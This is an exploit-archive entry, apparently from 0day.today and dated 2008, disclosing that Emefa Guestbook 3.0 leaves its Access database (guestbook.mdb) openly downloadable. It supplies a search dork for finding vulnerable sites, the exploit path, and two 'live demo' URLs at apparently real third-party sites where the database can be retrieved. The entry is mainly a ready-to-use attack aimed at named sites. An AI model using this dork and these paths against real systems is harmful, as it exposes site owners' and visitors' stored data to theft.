id: 4512
date: 12/21/2008
title: Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability
author: Cyber.Zer0
cves: 

============================================================
Emefa Guestbook 3.0 Remote Database Disclosure Vulnerability
============================================================

###########################################################
#Title:       Emefa Guestbook V 3.0 Remote Database Disclosure Vulnerability
#Credit:      Cyber.Zer0                                                                                                 
#Download:    http://www.emefa.dyndns.org/downloads/      
#Remote:      Yes                                         
#Dork:        "Emefa Guestbook V 3.0"                                            
############################################
--=[Database Disclosure]=--
http://target.com/guestbook.mdb
####################################

Live Demo

http://www.navigatorcentrum.nu/ung/guestbook/guestbook.mdb

Or
http://www.devalk.be/guestbook/guestbook.mdb



#  0day.today [2023-03-27]  #